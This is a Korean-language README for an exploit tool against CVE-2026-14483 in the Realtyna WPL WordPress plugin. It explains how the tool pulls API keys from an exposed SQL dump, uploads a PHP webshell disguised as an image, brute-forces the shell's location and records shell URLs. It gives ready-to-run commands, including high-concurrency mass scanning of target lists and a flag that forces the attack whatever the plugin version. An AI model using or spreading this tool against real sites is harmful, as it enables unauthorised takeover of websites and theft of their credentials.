
CVE-2026-14483 POC 익스플로잇 by MADEXPLOITS
Realtyna WPL Real Estate Listing WordPress 플러그인에 대한 인증되지 않은 원격 코드 실행.
| 필드 | 세부정보 |
|---|---|
| CVE | CVE-2026-14483 |
| 영향받는 버전 | <= 5.2.0 |
| 플러그인 | real-estate-listing-realtyna-wpl |
| 영향 | 인증되지 않은 PHP 웹셸 업로드 (RCE) |
| 스크립트 | CVE-2026-14483.py |
| 작성자 | MADEXPLOITS |
기본적으로 스크립트는 WPL 5.2.0을 실행 중인 대상만 공격합니다. 재정의하려면
--force를 사용하세요.
api_key / api_secret이 공개 SQL 마이그레이션 덤프를 통해 노출됩니다.set_property)에 인증하여 조작된 PHP 파일을 속성 이미지로 업로드할 수 있습니다.wp-content/uploads/WPL/{property_id}/ 아래에 위치합니다.pip install requests colorama
한 줄에 기본 URL 하나씩 포함된 텍스트 파일을 만드세요:
http://wplab.test
https://example.com
python CVE-2026-14483.py --targets targets.txt
성공적으로 업로드된 셸 URL은 result.txt(또는 --output)에 추가됩니다.
python CVE-2026-14483.py \
--targets targets.txt \
--output result.txt \
--user-id 1 \
--max-id 1000 \
--timeout 30 \
--threads 5 \
--debug \
--force
| 인자 | 기본값 | 설명 |
|---|---|---|
--targets | (필수) | 기본 URL이 포함된 파일 (한 줄에 하나) |
--output | result.txt | 발견된 셸 URL을 추가할 파일 |
--user-id | 1 | 새 속성을 소유할 WordPress / WPL 사용자 ID |
--payload | 내장 업로드 셸 | 사용자 정의 PHP 페이로드 문자열 |
--max-id | 1000 | 셸을 찾을 때 무차별 대입할 최대 속성 ID |
--timeout | 30 | HTTP 타임아웃(초) |
--threads | 5 | 동시 작업 스레드 수 |
--debug | off | 상세 디버그 로깅 |
--force | off | 버전이 5.2.0이 아니거나 감지할 수 없어도 공격 실행 |
Target URL
│
▼
Detect WPL version (readme.txt / wpl.php)
│ skip unless == 5.2.0 (or --force)
▼
Fetch api_key + api_secret from:
/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
│
▼
POST set_property via WPL I/O API
(upload image_0x89MADEXPLOITS.php as image/jpeg)
│
▼
Brute-force property ID 1..max-id
/wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
│
▼
Write shell URL → output file
기본 셸 마커: MADEXPLOITS
기본 원격 파일명: 0x89MADEXPLOITS.php
단일 실습 대상 (이 워크스페이스):
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug
높은 동시성 대량 스캔:
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt
버전 확인 실패 시 강제 공격:
python CVE-2026-14483.py --targets targets.txt --force
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.
result.txt에는 한 줄에 셸 URL 하나씩 포함됩니다.
readme.txt의 Stable tag: / Version:에서 읽으며, wpl.php로 폴백됩니다.--max-id를 높이세요.